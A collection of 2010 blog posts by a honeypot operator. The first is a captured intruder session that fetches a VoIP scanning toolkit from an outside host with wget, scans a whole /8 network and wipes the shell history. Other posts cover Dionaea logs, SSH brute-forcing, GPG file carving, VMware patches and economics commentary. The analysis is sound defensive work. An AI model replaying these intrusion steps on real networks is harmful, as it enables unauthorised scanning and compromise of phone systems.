sip/.svn/prop-base/staticfull.svn-base
sip/.svn/prop-base/groupdb.svn-base
sip/.svn/format
sip/.svn/entries
sip/.svn/all-wcprops
sales:/var/tmp/...# cd sip
sales:/var/tmp/.../sip# chmod 777 *
sales:/var/tmp/.../sip# chmod +x *
sales:/var/tmp/.../sip# ./svmap.py --randomize 89.0.0.0/8
___
{o,o}
|)__)
-"-"-
O RLY? yes
___
{o,o}
(__(|
-"-"-
NO WAI!
sales:/var/tmp/.../sip# cd ..
sales:/var/tmp/...# ls
sip.tgz sip
sales:/var/tmp/...# rm -rf *
sales:/var/tmp/...# w
sales:/var/tmp/...#
sales:/var/tmp/...#
sales:/var/tmp/...# history -c4
1 w
2 uname -a
3 cat /etc/issue
4 cat /proc/cpuinfo
5 cd /var/tmp/
6 ls
7 yum -y install gcc sendmail screen
8 apt-get install gcc sendmail screen
9 mkdir "..."
10 cd "..."
11 wget http://wed2010.ucoz.com/sip.tgz
12 tar zxvf s
13 locate sip.conf
14 apt-get install locate
15 locate sip.conf
16 ls
17 tar zxvf sip.tgz
18 cd sip
19 chmod 777 *
20 chmod +x *
21 ./svmap.py --randomize 89.0.0.0/8
22 cd ..
23 ls
24 rm -rf *
25 history -c4
sales:/var/tmp/...# history -c

The first thing the attacker does after getting oriented is to download screen and sendmail. Screen is a window session management tool. It's used to multiplex a terminal between several processes. If you get disconnected from the remote session, your session isn't lost. Sendmail is installed because very likely they wish to set up an open mail relay and/or communicate via email. Having your programs send their results via email is easy to script.

The attacker than goes to http://wed2010.ucoz.com and downloads sip.tgz using wget and unpacks it. He tries to check the sip.conf file which does not exist and then starts a sipvicious python scanning script called svmap.py. What is odd is that the attacker is randomly scanning the address space that he is coming from, i.e. ./svmap.py --randomize 89.0.0.0/8 is in the same network space as 89.42.192.73. This would tend to suggest that the attacker is either making an internal attack on his ISP look like an external attack from the U.S., or the attacker has compromised a Romanian system and wants to expand his range on the network without compromising his toehold. A third possibility is that it's a functionality test. The attacker has scanned that network, has a list of VOIP systems, and wants to check his VOIP scanner against that list to make sure it works and is not being filtered.

Team Cymru has a post from September 3rd, about the new phreaks using sipvicious to find and attack VOIP PBX systems. Unfortunately, since my router hosed and the connection was lost, it is likely that the attacker didn't finish configuring sipvicious or sendmail and could not reconnect to finish the session. The toolkit I have appears to have the following timestamp:

Sep 3 16:41 .svn

which coincides with a spike in port 5060 traffic for September 3, 2010 according to the SANS ISC 5060 Port Report.

September 2010 port 5060 traffic

It may just be a coincidence and signify that the attackers are using a fairly recent development version of sipvicious since I can't find any custom modifications to the code.

Dominant Classes Derive From Surviving Mass Extinction Events

2010-10-05T21:19:00.007-05:00

A new discovery of dinosaur footprints 2 million years after the Permian extinction event suggests that dinosaurs rose to ascendancy because they were the majority of survivors. In other words, the Permian mass extinction led directly to the success of the dinosaurs until they were wiped out in another mass extinction 160 million or more years later. As pointed out in the article, the later mass extinction at the end of the Cretaceous allowed mammals to evolve and spread throughout the planet. As we enter this third planetary mass extinction event, will humans just be the cause of the extinction of 95% of life on the planet, including ourselves? Are we setting the stage for something else to replace us just like we replaced the dinosaurs? The difference this time will be that a species caused the mass extinction rather than some external environmental event like volcanoes or asteroid impacts.

Gonzalo Lira Interview on The Keiser Report

2010-10-05T18:43:00.006-05:00

Gonzalo Lira was interviewed on The Keiser Report. The full interview is below.

The entire show is here.

The State of IT Security

2010-10-03T21:43:00.004-05:00

The state of IT Security is rather dismal. Attacks on vulnerable services that worked 10 years ago still work today despite the fact that operating systems have been hardened, and firewalls and intrusion detection and prevention systems (IDS/IPS) are in place. What really makes me mad though is the lack of available information. I purchased a book called Network Security Assessment. While it's a useful reference to have, it is obsolete and incomplete in sections. How do I know this? I have been running honeypots. I discovered that the malicious elements are using a tool called UnixCod to brute force SSH connections. I have only found one review of this "password auditing tool". To say that it is a password auditing tool is being generous. UnixCod is a fast network scanner that finds systems running the SSH service and tries to exploit them with a brute force dictionary attack of common usernames and passwords that has been around since 2005. You'd think a book written in 2008 would mention such a tool, but it doesn't. In fact, this tool can scan 64,516 hosts in 9 minutes flat and then attack the ones only running SSH. Maybe this is a slow tool by state of the art standards, but I was impressed. This highlights a growing problem with IT Security in general, the lack of distributive knowledge bases. The people who are supposed to protect the networks are months, if not years behind, in knowing what the people attacking them are up to. There is not enough knowledge sharing within the community, and it only hurts the defenders. To add insult to injury, why does my ISP allow brute force ssh and VOIP attacks on my systems from overseas? Obviously my ISP doesn't care if I get hacked and lose money, but my bank might. It would be rather trivial to drop packets from overseas IP addresses that are being malicious and running such tools to protect one's customers, that is what IDS/IPS systems are designed to do, I guess that the major ISPs just don't care with the exception of Comcast.

The Danger of Science Denial

2010-09-29T20:19:00.001-05:00

Here's Simon Singh's take on the issue. He believes that it's a matter of trust and the fact that a lot of scientific findings go against conventional common sense, while Specter believes that people fear what they don't understand. Both dynamics are at work most likely.

One of Those Uh-Oh Moments - Recovering a Digital Needle From a Digital Haystack

2010-09-28T21:32:00.014-05:00

I've been building a live DVD honeypot distro for the last month or so on a VMware virtual machine. It initially had a 20GB virtual hard drive that I thought would have enough space, but Ubuntu builds up cruft at a pretty rapid pace and before I knew it I was out of disk space. No problem thought I. I'll just resize the virtual disk file using vmware-vdiskmanager. That was the easy part. The not so easy part was resizing the ext4 filesystem on the newly resized virtual drive. I had backed up my build directory and moved it off the system as a gnuzipped tar archive. I didn't use the system for much of anything else, so I proceeded to remove the ext4 journal and resize the filesystem using resize2fs (a recent version) via a live DVD. Everything was still there, removed and recreated the resized partitions, and fsck -n /dev/sda1 checked out okay. I could still see the data in /media/drive when I checked, so I rebooted the system. When the live DVD finished rebooting, I checked the media directory and nothing was there. Checked the virtual drive; fsck -n /dev/sda1 stated that no superblock could be found. Then, as the sinking feeling took hold, I realized that I had overlooked backing up one other crucial file, my gnupg secring.gpg file I had recently created. If I had decrypted a certain email and stored the plain text away, it would have been no big deal. Or, if I had backed up the vmware virtual machine and played with a copy, it would have been trivial to recover, but I'd taken none of those, in hindsight, prudent measures.

Well, what to do. The easy way out would be to swallow my pride, rebuild the virtual machine, create a new secret key, and email the new public key to my correspondent and ask him to reencrypt the original message and resend it. The harder, but more educating, way out of the problem would be to recover the file. The data was likely still on the drive, the pointers to that data were likely gone or corrupted at best. I had nothing to lose by trying and I needed to hone my data recovery/ digital forensics skills. So, using dd and ssh via a script I wrote about six years ago, I created a bit by bit image of the virtual hard drive on another system. I loaded the image file into autopsy and the results weren't good. Autopsy would only be able to perform keyword searches on the image. The data layer really couldn't be seen or analyzed. I tried a few keyword searches, but it was futile. I called it a night at that point and went to bed.

The next morning, I decided the best approach would be to go with scalpel or some other data carver. Data carvers search for files using the file's header and footer information. Once the file is recovered, you just rename it to what you called it previously and you are good to go. Searching for "secring.gpg magic bytes, header, scalpel.conf" on Google led me nowhere. So, I generated two new public and private keys on my laptop and an Ubuntu virtual machine and compared their headers and footers. Each file had a slightly different header and footer.

I could tell you what I tried, but I'll give you the results. I created four new gpg entries in scalpel.conf, and two of them worked perfectly.

secring.gpg:

gpg with header "\x95\x03\xbe" and footer "\xb0\x02\x00\x00" --> 1 files

pubring.gpg:

gpg with header "\x99\x01\x0d" and footer "\xb0\x02\x00\x03" --> 3 files

As you can see above, I could have used a longer header sequence by appending \x04\x4c or \x04\x4c\xa2 to each header sequence. The longer the sequence, the fewer results one gets. This cuts down on false positives, but it may result in no files being recovered at all. One just has to do some experimental runs with scalpel to tune the scalpel.conf configuration file. In this case, I only wanted gpg files, so I commented out every entry except the newly created gpg entries. After making a copy of the image, I split the image into 10GB files with split, i.e.

split -b 10GB livecd

which results in three 9.3GB files called xaa, xab, xac, and a 2.1GB file called xad. Running scalpel on the 30GB file resulted in an estimated 28 hour second pass scan. Narrowing the search to just gpg files and scanning 9.3GB files resulted in a complete file carving (2 passes) within 20 minutes per 9.3GB file. The gpg files were recovered from the xaa subfile.

I rebuilt the corrupted virtual machine once I had the recovered files. I created a .gnupg directory within the user's home directory and copied the pubring.gpg and secring.gpg files into that directory. Using apt-get, you can install thunderbird and the enigmail xpi plugin seamlessly:

apt-get install thunderbird enigmail gnupg (if gnupg isn't installed).

You can test gnupg like so:

gpg --list-keys (for querying keys stored in the public keyring), and
gpg --list-secret-keys (for keys stored in the secret keyring).

Then you start thunderbird and give it your name, email address, and password. It's smart enough to set up your gmail server settings for you. You just give enigmail your secret key passphrase and you can decrypt any messages encrypted using your keys.

I could have searched for the pubring.gpg using my email address since it is embedded in the public key using grep:

grep -r "jmoore@gmail.com" /scalpelresults/

will search all of the carved files for that text expression. To eliminate carved emails, pipe the output to grep with the v option like so:

grep -r "jmoore@gmail.com" /scalpelresults/ | grep -v "To: John Moore" | grep -v "From:
John Moore" | grep -v "Return-Path"

but fortunately, just browsing for the 4 files listed in the audit.txt file worked, since scalpel placed them in their own subdirectories.

Stuxnet

2010-09-22T19:37:00.020-05:00

I would write about the Stuxnet worm which seems to be the first publicly known piece of military grade attackware, but Bruce Schneier and others have written extensively about it. Langner's blog and Geekheim.de have the most pieces of evidence for who did what to whom where. The Symantec Security Response blog has some very good technical breakdowns of the reverse engineering of specific parts of the worm. Air gapping the networks would not help because the worm was designed to defeat that barrier by using USB sticks which is a method originally used by floppy disk based worms in the days before PCs were connected to the Internet. Since our own DOD isn't smart enough to protect its own networks from USB worms, the likely American suspects are the CIA or NSA, probably the latter. But, the nation who had the best motive for doing this very cost effective attack was Israel. The Natanz ultracentrifuges were the likely target of this operation.

Update (10/01/2010): F-secure has a nice Stuxnet Questions and Answers post along with a video demonstration of what Stuxnet is capable of. Two pieces of internal evidence from the reverse engineering:

1. The path statement in the compiled code, \myrtus\src\objfre_w2k_x86\i386\guava.pdb, has the words myrtus and guava. Guavas are plants of the myrtle family. They are a type of pomegranate which serves as the Jewish symbols of righteousness and fruitfulness. Is Stuxnet a weapon of righteousness targeting the servants (machines) of the enemies of Israel? In this case, is the enemy, Iran? Are we dealing with a former biologist who is now a programmer, or with someone exposed to taxonomic nomenclature who could make an inside joke?

2. The registry key created called 19790509, which is the date, May 9, 1979, which was the date Habib Elghanian was executed in Iran as a spy on what appear to be completely false charges. His death led to the mass exodus of 100,000 Jews from Iran.

Here's The Register's analysis. Symantec has released the Steuxnet Whitepaper.

A Honeypot in Action

2010-09-22T18:48:00.001-05:00

Here's a nice Symantec blog post about an attacker interacting with a high interaction honeypot.

Why You Should Stay in Earth Orbit When You Visit

2010-09-22T18:38:00.001-05:00

The reason why aliens don't visit Earth often.

Yves Smith Interview on The Keiser Report

2010-09-22T17:09:00.007-05:00

Yves Smith of Naked Capitalism was on the Keiser Report. Here's the excerpted interview.

VMware Workstation 6.5.4 and VMware Workstation 7 Vmmon Compilation Error Fix with Kernel 2.6.32 and 2.6.35

2010-09-17T12:15:00.024-05:00

I've been having to run VMware Workstation 6.5.4 on Linux kernel 2.6.30 because the modules will not compile on any higher kernel. VMware was offering a 30% discount on upgrades, so I thought I'd upgrade and see if the module compile problems had been fixed. Well, they hadn't. The errors occur in iommu:

CC [M] /tmp/vmware-root/modules/vmmon-only/linux/iommu.o
/tmp/vmware-root/modules/vmmon-only/linux/iommu.c: In function ‘IOMMU_SetupMMU’:
/tmp/vmware-root/modules/vmmon-only/linux/iommu.c:156: error: implicit declaration of function ‘iommu_map_range’
/tmp/vmware-root/modules/vmmon-only/linux/iommu.c: In function ‘IOMMUUnregisterDeviceInt’:
/tmp/vmware-root/modules/vmmon-only/linux/iommu.c:216: warning: ignoring return value of ‘device_attach’, declared with attribute warn_unused_result
/tmp/vmware-root/modules/vmmon-only/linux/iommu.c: In function ‘IOMMU_VMCleanup’:
/tmp/vmware-root/modules/vmmon-only/linux/iommu.c:403: error: implicit declaration of function ‘iommu_unmap_range’
make[2]: *** [/tmp/vmware-root/modules/vmmon-only/linux/iommu.o] Error 1
make[1]: *** [_module_/tmp/vmware-root/modules/vmmon-only] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.35-4.slh.11-aptosid-amd64'
make: *** [vmmon.ko] Error 2

I could have saved myself $70 since I got module compile issues, i.e. fatal make errors, for free with either 6.5.4 or 7.x. Fortunately, there is an easy fix documented at www.rrfx.net.

If you don't wish to visit the link, the fix by Robert Reid is documented below:

cd /tmp
tar xvf /usr/lib/vmware/modules/source/vmmon.tar -C /tmp
perl -pi -e 's,_range,,' vmmon-only/linux/iommu.c
tar cvf /usr/lib/vmware/modules/source/vmmon.tar vmmon-only

To get VMware Workstation 6.5.4 to work on kernel 2.6.32 or above on Ubuntu 10.04 LTS, you'll need to do two things, get the installer to bypass a hang condition and patch vnetUserListener.c and pgtbl.h by adding two include statements, #include "compat_sched.h" and #include "<"linux/sched.h">", to each file:

1. chmod u+x VMware-Workstation-6.5.*.bundle
./VMware-Workstation-6.5.*.bundle --ignore-errors

in a separate terminal run:

while true; do sudo killall -9 vmware-modconfig-console; sleep 1; done

Original documentation is here.

2. Patch vmci and vmnet documented here and here:

tar xvf /usr/lib/vmware/modules/source/vmnet.tar -C /tmp
tar xvf /usr/lib/vmware/modules/source/vmci.tar -C /tmp

cd /tmp

perl -pi -e 's,("vnetInt.h"),\1\n#include "compat_sched.h",' vmnet-only/vnetUserListener.c
perl -pi -e 's,("compat_sched.h"),\1\n#include "<"linux/sched.h">"",' vmnet-only/vnetUserListener.c
perl -pi -e 's,("compat_page.h"),\1\n#include "compat_sched.h",' vmci-only/include/pgtbl.h
perl -pi -e 's,("compat_sched.h"),\1\n#include "<"linux/sched.h">"",' vmci-only/include/pgtbl.h

tar cvf /usr/lib/vmware/modules/source/vmnet.tar /tmp/vmnet-only
tar cvf /usr/lib/vmware/modules/source/vmci.tar /tmp/vmci-only

note: "<" and ">" should just be < and >, but blogspot.com's servers make things like header files disappear in source code.

Now run vmware-modconfig --console --install-all to finish the VMware Workstation installation.

The Last Thing Government Will Do

2010-09-14T12:00:00.009-05:00

Economist Steve Keen says that the major economies are entering a debt deflationary spiral. The way out of it would be to increase workers' wages which would allow them to pay off their debts and create inflation. But, economic policy makers don't understand this, and therefore, it will be the last thing they do.

The entire show is called Global Debt Collapse

Dean Baker points out that economists are always quick to blame workers for the economy being depressed rather than the bad judgments of the economic policy makers themselves.

Before examining the argument here more closely, it is worth noting that arguments about rising structural unemployment come around during every recession. When the economy fails to produce jobs fast enough to bring down the unemployment rate economists quickly turn to blaming the workers. The problem is not that economists came up with bad policies; the problem is that workers don't have the right skills or live in the right place. This happened after each of the last four recessions.

The Economy Is Not The Weather

2010-09-10T07:53:00.008-05:00

The economy is not like the weather, not a natural phenomenon. People may complain about the weather, but there is little one can do about the weather other than enjoy it when it is nice, or seek shelter from it when it is less than nice. The economy is derived from people's individual and collective actions and commerce. Therefore, people control the economy either directly or indirectly. When an investment banker states that financial crises happen every 5-10 years, he's lying. Policymakers are supposed to regulate markets to prevent such man made disasters, and that is their function by law. When politicians say that there is nothing they can do to fix the economy, they are lying. All our politicians have done thus far is throw money at the problem of insolvent banks. They have not fixed the underlying problem which is that the banks are broke. They know that the government has the means and ability to put people back to work, help them stay fed, and keep them in their homes, but there is no political will to do so just like there was no political will to fix Wall Street. There is no political will to reign in defense spending, healthcare costs, drug costs, insurance costs, an unfair tax code full of loop holes, or lax trade policies that allow jobs to go overseas resulting in lost income, revenue, and taxes for American workers, businesses, and governments. There is no will to fix the economics profession as well which supplies the majority of advisors and policymakers to government and business. So Americans will still be receiving bad at best, and deceitful at worst, advice from a profession that is supposed to be able to predict economic trends and advise economic solutions to problems. Instead, many economists and politicians act and sound like TV weathermen. The few economists and other professionals who do recommend solutions are pretty much either marginalized, derided, ignored, or their ideas watered down to be effectively useless. This situation can not go on. Either the Middle Class collapses and we all join the ranks of the Poor, and the country collapses in a state of chaos, or we pull together and fix the nation, and lift all boats, not just the boats of the well connected and the wealthy.

If you think the GOP will come to the rescue this November, better think again. The GOP helped cause this mess. The GOP ran Congress from 1994-2006. They had control of the Executive Branch from 2000-2008, and the Judicial Branch from 2000 onwards. Most Federal Reserve governors are Republicans. Many administration officials are leftovers from the Bush Administration. The Democrats are not blameless, either, but they weren't a major contributor to the mess we are in. Unfortunately, the Democrats seem to be a party divided, and the Obama Administration is itself divided. The Democratic Party's solutions have been weak or ineffective at best. Jon Stewart sums the current situation up this way:"What the Democrats do, doesn't matter!"
When Treasury fights for Wall Street which means the regulators are effectively lobbying for those they are supposed to regulate, government is divided and at odds with itself, and likely compromised, if not corrupted.

Finding Out How Ethical and Safe Your Internet Service Provider Is

2010-08-31T16:29:00.011-05:00

If you use dial-up, DSL, cable, or FiOS, you are having to deal with an Internet Service Provider in the form of a phone company or a cable company. How does one find out how safe and ethical their ISP is? There are two tools to help the average person get a sense of how safe they are in trusting their ISP. One tool is FIRE which is an acronym for "Finding Rogue Networks". But to use FIRE, one needs an AS (Autonomous Systems) number. Fortunately, caida.org has a tool called AS Rank which will give you your ISP's AS numbers. One can also use Arbor Network's ATLAS to see the top 20 worst attackers currently on the Internet. (FIRE doesn't see some of those systems and networks, so there is filtering going on.) So, how does my ISP, verizon.net, stack up? Pretty well actually according to FIRE and AS Rank. There are no Exploit or Command and Control Servers on those networks. These are the only two systems that FIRE knows of on VZB and VZ networks:

65.209.177.10 US AS701 exploit server
70.107.249.167 US AS19262 C&C server

However, the ISP's may be preventing FIRE from seeing the whole picture. My honeypot has found these infected systems on my local verizon.net sub network:

[29082010 21:44:40] [192.168.1.12:445->71.97.10.85:50973]
[30082010 20:24:05] [192.168.1.12:445->71.96.233.69:1370]
[30082010 20:38:19] [192.168.1.12:445->71.97.151.10:3401]
[31082010 20:06:06] [192.168.1.12:445->71.96.77.124:54794]
[29082010 21:44:38] [192.168.1.12:445->71.97.10.85:50969]
[30082010 18:02:09] [192.168.1.12:135->71.91.137.62:2013]
[30082010 20:24:04] [192.168.1.12:445->71.96.233.69:1368]
[30082010 20:38:19] [192.168.1.12:445->71.97.151.10:2800]
[31082010 16:37:35] [192.168.1.12:80->71.96.77.124:53541]

Now then, Verizon could be blocking or filtering their network such that these systems can not communicate with the outside world (blacklisting) or they could be blocking FIRE from seeing any of these systems that may be servers. With a P2P botnet, any infected system can be both a client and a server. That said, most of the infected systems in the world are likely IRC bots and are clients for the time being until all botnets evolve into true P2P botnets. So, for the present, FIRE's results are likely a lower, but fairly accurate limit of the true extent of the problem. Also, one must keep in mind that an ISP like Verizon has little control over subscribers' computers in their homes compared to an ISP whose clients lease a server or virtual server in a datacenter. But FIRE's results can still be useful as a qualitative measure of an ISP's security, ethical, and reputation mindset.

Let's compare hosting companies for instance. Here's

The Planet AS 21844
GoDaddy.com AS 26496
Rackspace AS 33070
Rackspace AS 10532
Rackspace AS 27357
Terremark Worldwide (all)

Clearly, some providers care more than others about who their clients are. Rackspace looks a bit dirty, but they host a larger network than the others. They are relatively clean compared to The Planet or GoDaddy.com.

Building A Nation of Know-Nothings

2010-08-30T06:38:00.004-05:00

Building a Nation of Know-Nothings courtesy of Timothy Egan of The New York Times. In other words, don't believe someone just because they are a personality. Question authority and come to your own conclusions after researching the subject.

Apple Genome Sequenced

2010-08-30T05:43:00.006-05:00

Malus sieversii, native to the mountains of southern Kazakhstan, is the wild ancestor of the domestic apple tree according to the Malus domestica genomic sequence. Perhaps we will be wise enough to save the ancestral species in order to breed better tastier apples. The genomic sequence will now allow plant breeders to fine tune their breeding. They can do it without genetic modification, but it is a tedious process. Sooner or later, the apples you eat will be a genetically engineered crop because genetic engineering is a more exact process since one is only adding a known gene here and there instead of a portion of a chromosome here and there which contains a slew of genes and likely some you don't want along with the one you did want. It's kind of funny that botanists were still arguing over the ancestor to the apple until now. At least that argument is put to rest.

Dionaea, First Impressions

2010-08-30T02:59:00.005-05:00

Dionaea is a new honeypot application, the successor to Nepenthes, a low interaction honeypot. Dionaea is still a bit rough around the edges. The compiling and installation instructions are quite good. I would not install the optional openssl step via cvs though with a Debian or Ubuntu distribution. When I did, I got a segmentation fault in the libcrypto.so library. I did get dionaea to work the second attempt on a clean Ubuntu 10.04 x86_64 virtual machine. Installing the OS and the application takes about 1.5 hours. I am having trouble accessing the sqlite database. The readlogsqltree.py script works once you copy the modules directory from where you built it into the /opt/dionaea directory, and point the script to that location. However, I got no output or errors. Documentation is almost nonexistent since the application is still alpha code essentially. The honeypot is working according to the dionaea.log, but the dionaea.log file is even more cryptic than nepenthes.log.

Here are some preliminary data:

grep established dionaea.log | grep -v debug | grep -v 192.168.1.8 | awk '{ print $1, $2, $8 }' | uniq -c | sort -n | grep -v established | grep -v binding.c
1 [29082010 16:37:39] [192.168.1.12:135->71.53.70.248:1861]
1 [29082010 16:37:40] [192.168.1.12:135->71.53.70.248:1861]
1 [29082010 16:37:40] [192.168.1.12:135->71.53.70.248:2047]
1 [29082010 16:37:40] [192.168.1.12:135->71.53.70.248:2047]
1 [29082010 16:37:40] [192.168.1.12:59895->71.53.70.248:0]
1 [29082010 16:38:14] [192.168.1.12:445->71.123.126.104:3062]
1 [29082010 20:38:58] [192.168.1.12:80->77.220.185.190:59894]
1 [29082010 20:38:59] [192.168.1.12:80->77.220.185.190:59894]
1 [29082010 21:38:15] [192.168.1.12:1957->71.123.126.104:3865]
1 [29082010 21:38:16] [192.168.1.12:1957->71.123.126.104:3865]
1 [29082010 21:38:16] [192.168.1.12:40904->]
1 [29082010 21:38:16] [192.168.1.12:40904->71.123.126.104:22352]
1 [29082010 21:38:16] [192.168.1.12:445->71.123.126.104:3062]
1 [29082010 21:38:26] [192.168.1.12:40904->71.123.126.104:22352]
1 [29082010 21:39:40] [192.168.1.12:59895->71.53.70.248:69]
1 [29082010 21:44:38] [192.168.1.12:445->71.97.10.85:50973]
1 [29082010 21:44:40] [192.168.1.12:445->71.97.10.85:50973]
1 [29082010 21:52:07] [192.168.1.12:135->222.186.27.80:4716]
1 [29082010 21:52:08] [192.168.1.12:135->222.186.27.80:4716]
2 [29082010 16:37:39] [192.168.1.12:135->71.53.70.248:1796]
2 [29082010 16:37:40]
2 [29082010 16:38:14] [192.168.1.12:445->71.123.126.104:2950]
2 [29082010 20:38:38] [192.168.1.12:80->77.220.185.190:56928]
2 [29082010 20:38:38] [192.168.1.12:80->77.220.185.190:56979]
2 [29082010 20:38:39] [192.168.1.12:80->77.220.185.190:57031]
2 [29082010 20:38:39] [192.168.1.12:80->77.220.185.190:57084]
2 [29082010 20:38:39] [192.168.1.12:80->77.220.185.190:57140]
2 [29082010 20:38:40] [192.168.1.12:80->77.220.185.190:57199]
2 [29082010 20:38:40] [192.168.1.12:80->77.220.185.190:57256]
2 [29082010 20:38:41] [192.168.1.12:80->77.220.185.190:57312]
2 [29082010 20:38:41] [192.168.1.12:80->77.220.185.190:57364]
2 [29082010 20:38:41] [192.168.1.12:80->77.220.185.190:57419]
2 [29082010 20:38:42] [192.168.1.12:80->77.220.185.190:57475]
2 [29082010 20:38:42] [192.168.1.12:80->77.220.185.190:57523]
2 [29082010 20:38:43] [192.168.1.12:80->77.220.185.190:57583]
2 [29082010 20:38:43] [192.168.1.12:80->77.220.185.190:57643]
2 [29082010 20:38:43] [192.168.1.12:80->77.220.185.190:57704]
2 [29082010 20:38:44] [192.168.1.12:80->77.220.185.190:57762]
2 [29082010 20:38:44] [192.168.1.12:80->77.220.185.190:57817]
2 [29082010 20:38:45] [192.168.1.12:80->77.220.185.190:57873]
2 [29082010 20:38:45] [192.168.1.12:80->77.220.185.190:57934]
2 [29082010 20:38:45] [192.168.1.12:80->77.220.185.190:57987]
2 [29082010 20:38:46] [192.168.1.12:80->77.220.185.190:58045]
2 [29082010 20:38:46] [192.168.1.12:80->77.220.185.190:58101]
2 [29082010 20:38:47] [192.168.1.12:80->77.220.185.190:58161]
2 [29082010 20:38:47] [192.168.1.12:80->77.220.185.190:58214]
2 [29082010 20:38:47] [192.168.1.12:80->77.220.185.190:58262]
2 [29082010 20:38:48] [192.168.1.12:80->77.220.185.190:58322]
2 [29082010 20:38:48] [192.168.1.12:80->77.220.185.190:58373]
2 [29082010 20:38:49] [192.168.1.12:80->77.220.185.190:58447]
2 [29082010 20:38:49] [192.168.1.12:80->77.220.185.190:58505]
2 [29082010 20:38:49] [192.168.1.12:80->77.220.185.190:58565]
2 [29082010 20:38:50] [192.168.1.12:80->77.220.185.190:58626]
2 [29082010 20:38:50] [192.168.1.12:80->77.220.185.190:58681]
2 [29082010 20:38:51] [192.168.1.12:80->77.220.185.190:58735]
2 [29082010 20:38:51] [192.168.1.12:80->77.220.185.190:58793]
2 [29082010 20:38:51] [192.168.1.12:80->77.220.185.190:58850]
2 [29082010 20:38:52] [192.168.1.12:80->77.220.185.190:58909]
2 [29082010 20:38:52] [192.168.1.12:80->77.220.185.190:58964]
2 [29082010 20:38:53] [192.168.1.12:80->77.220.185.190:59024]
2 [29082010 20:38:53] [192.168.1.12:80->77.220.185.190:59080]
2 [29082010 20:38:53] [192.168.1.12:80->77.220.185.190:59133]
2 [29082010 20:38:54] [192.168.1.12:80->77.220.185.190:59201]
2 [29082010 20:38:54] [192.168.1.12:80->77.220.185.190:59250]
2 [29082010 20:38:55] [192.168.1.12:80->77.220.185.190:59310]
2 [29082010 20:38:55] [192.168.1.12:80->77.220.185.190:59371]
2 [29082010 20:38:55] [192.168.1.12:80->77.220.185.190:59429]
2 [29082010 20:38:56] [192.168.1.12:80->77.220.185.190:59490]
2 [29082010 20:38:56] [192.168.1.12:80->77.220.185.190:59544]
2 [29082010 20:38:56] [192.168.1.12:80->77.220.185.190:59600]
2 [29082010 20:38:57] [192.168.1.12:80->77.220.185.190:59656]
2 [29082010 20:38:57] [192.168.1.12:80->77.220.185.190:59714]
2 [29082010 20:38:58] [192.168.1.12:80->77.220.185.190:59773]
2 [29082010 20:38:58] [192.168.1.12:80->77.220.185.190:59834]
2 [29082010 20:38:59] [192.168.1.12:80->77.220.185.190:59963]
2 [29082010 20:38:59] [192.168.1.12:80->77.220.185.190:60017]
2 [29082010 20:39:00] [192.168.1.12:80->77.220.185.190:60078]
2 [29082010 20:39:00] [192.168.1.12:80->77.220.185.190:60131]
2 [29082010 20:39:00] [192.168.1.12:80->77.220.185.190:60187]
2 [29082010 20:39:01] [192.168.1.12:80->77.220.185.190:60250]
2 [29082010 20:39:01] [192.168.1.12:80->77.220.185.190:60313]
2 [29082010 20:39:02] [192.168.1.12:80->77.220.185.190:60373]
2 [29082010 20:39:02] [192.168.1.12:80->77.220.185.190:60431]
2 [29082010 20:39:02] [192.168.1.12:80->77.220.185.190:60491]
2 [29082010 20:39:03] [192.168.1.12:80->77.220.185.190:60553]
2 [29082010 20:39:03] [192.168.1.12:80->77.220.185.190:60614]
2 [29082010 20:39:04] [192.168.1.12:80->77.220.185.190:60676]
2 [29082010 20:39:04] [192.168.1.12:80->77.220.185.190:60745]
2 [29082010 20:39:05] [192.168.1.12:80->77.220.185.190:60805]
2 [29082010 20:39:05] [192.168.1.12:80->77.220.185.190:60867]
2 [29082010 20:39:05] [192.168.1.12:80->77.220.185.190:60925]
2 [29082010 20:39:06] [192.168.1.12:80->77.220.185.190:32812]
2 [29082010 20:39:06] [192.168.1.12:80->77.220.185.190:32871]
2 [29082010 20:39:06] [192.168.1.12:80->77.220.185.190:60990]
2 [29082010 20:39:07] [192.168.1.12:80->77.220.185.190:32935]
2 [29082010 20:39:07] [192.168.1.12:80->77.220.185.190:32999]
2 [29082010 20:39:08] [192.168.1.12:80->77.220.185.190:33061]
2 [29082010 20:39:08] [192.168.1.12:80->77.220.185.190:33120]
2 [29082010 20:39:08] [192.168.1.12:80->77.220.185.190:33177]
2 [29082010 20:39:09] [192.168.1.12:80->77.220.185.190:33233]
2 [29082010 20:39:09] [192.168.1.12:80->77.220.185.190:33302]
2 [29082010 20:39:10] [192.168.1.12:80->77.220.185.190:33369]
2 [29082010 20:39:10] [192.168.1.12:80->77.220.185.190:33427]
2 [29082010 20:39:11] [192.168.1.12:80->77.220.185.190:33497]
2 [29082010 20:39:11] [192.168.1.12:80->77.220.185.190:33556]
2 [29082010 20:39:11] [192.168.1.12:80->77.220.185.190:33614]
2 [29082010 20:39:12] [192.168.1.12:80->77.220.185.190:33674]
2 [29082010 20:39:12] [192.168.1.12:80->77.220.185.190:33732]
2 [29082010 20:39:13] [192.168.1.12:80->77.220.185.190:33795]
2 [29082010 20:39:13] [192.168.1.12:80->77.220.185.190:33855]
2 [29082010 20:39:13] [192.168.1.12:80->77.220.185.190:33914]
2 [29082010 20:39:14] [192.168.1.12:80->77.220.185.190:33977]
2 [29082010 20:39:14] [192.168.1.12:80->77.220.185.190:34039]
2 [29082010 20:39:15] [192.168.1.12:80->77.220.185.190:34102]
2 [29082010 20:39:15] [192.168.1.12:80->77.220.185.190:34161]
2 [29082010 20:39:15] [192.168.1.12:80->77.220.185.190:34221]
2 [29082010 20:39:16] [192.168.1.12:80->77.220.185.190:34282]
2 [29082010 20:39:16] [192.168.1.12:80->77.220.185.190:34341]
2 [29082010 20:39:17] [192.168.1.12:80->77.220.185.190:34406]
2 [29082010 20:39:17] [192.168.1.12:80->77.220.185.190:34467]
2 [29082010 20:39:17] [192.168.1.12:80->77.220.185.190:34525]
2 [29082010 20:39:18] [192.168.1.12:80->77.220.185.190:34592]
2 [29082010 20:56:51] [192.168.1.12:80->64.126.23.234:53897]
2 [29082010 21:44:38] [192.168.1.12:445->71.97.10.85:50969]
2 [29082010 23:20:25] [192.168.1.12:1433->61.164.148.33:5002]

grep established dionaea.log | grep -v debug | grep -v 192.168.1.8 | awk '{ print $1, $2, $8 }' | uniq -c | sort -n | grep -v established | grep -v binding.c | grep 77.220.185.190 | wc -l
102

IP address 77.220.185.190 performed 102 attacks on port 80 in 40 seconds. It was obviously an automated attack, but I have no idea what tool performed the attack. The IP address maps to Moscow, Russia at the MNOGOBYTE colocation service.

grep sip dionaea.log
